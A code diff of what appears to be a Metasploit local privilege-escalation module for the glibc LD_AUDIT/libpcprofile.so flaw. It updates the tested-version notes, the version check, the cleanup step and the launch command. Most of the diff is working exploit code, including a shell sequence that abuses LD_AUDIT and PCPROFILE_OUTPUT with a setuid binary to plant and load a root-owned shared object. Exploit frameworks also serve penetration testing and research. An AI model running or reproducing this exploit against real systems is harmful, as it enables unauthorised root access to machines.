@@ -34,10 +34,11 @@ def initialize(info = {})
34
34
LD_AUDIT resulting in arbitrary code execution.
35
35
36
36
This module has been tested successfully on glibc version 2.11.1 on
37
- Ubuntu 10.04 x86_64.
37
+ Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386 .
38
38
39
- RHEL 5 and Debian 5 are reportedly affected, but untested. Some glibc
40
- distributions do not contain the vulnerable libpcprofile.so library.
39
+ RHEL 5 is reportedly affected, but untested. Some glibc distributions
40
+ do not contain the libpcprofile.so library required for successful
41
+ exploitation.
41
42
} ,
42
43
'License' => MSF_LICENSE ,
43
44
'Author' =>
@@ -95,7 +96,7 @@ def suid_exe_path
95
96
def check
96
97
glibc_banner = cmd_exec 'ldd --version'
97
98
glibc_version = Gem ::Version . new glibc_banner . scan ( /^ldd\s +\( .*\) \s +([\d \. ]+)/ ) . flatten . first
98
- if glibc_version . eql? ''
99
+ if glibc_version . to_s . eql? ''
99
100
vprint_error 'Could not determine the GNU C library version'
100
101
return CheckCode ::Safe
101
102
elsif glibc_version >= Gem ::Version . new ( '2.12.2' ) ||
@@ -142,8 +143,8 @@ def upload_and_chmodx(path, data)
142
143
end
143
144
144
145
def on_new_session ( client )
145
- # remove root owned shared object
146
- if client . type == 'meterpreter'
146
+ # remove root owned shared object from system load path
147
+ if client . type . eql? 'meterpreter'
147
148
client . core . use 'stdapi' unless client . ext . aliases . include? 'stdapi'
148
149
client . fs . file . rm @so_path
149
150
else
@@ -226,7 +227,7 @@ def exploit
226
227
exp = %(
227
228
umask 0
228
229
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="#{ @so_path } " #{ suid_exe_path } 2>/dev/null
229
- umask 2
230
+ umask 0022
230
231
cat #{ so_path } > #{ @so_path }
231
232
LD_AUDIT="#{ so_name } .so" #{ suid_exe_path }
232
233
echo > #{ @so_path }
@@ -240,7 +241,9 @@ def exploit
240
241
241
242
# Launch exploit
242
243
print_status 'Launching exploit...'
243
- output = cmd_exec "#{ exp_path } &"
244
+ # The echo at the end of the command is required
245
+ # else the original session may die
246
+ output = cmd_exec "#{ exp_path } & echo "
244
247
output . each_line { |line | vprint_status line . chomp }
245
248
end
246
249
end
0 commit comments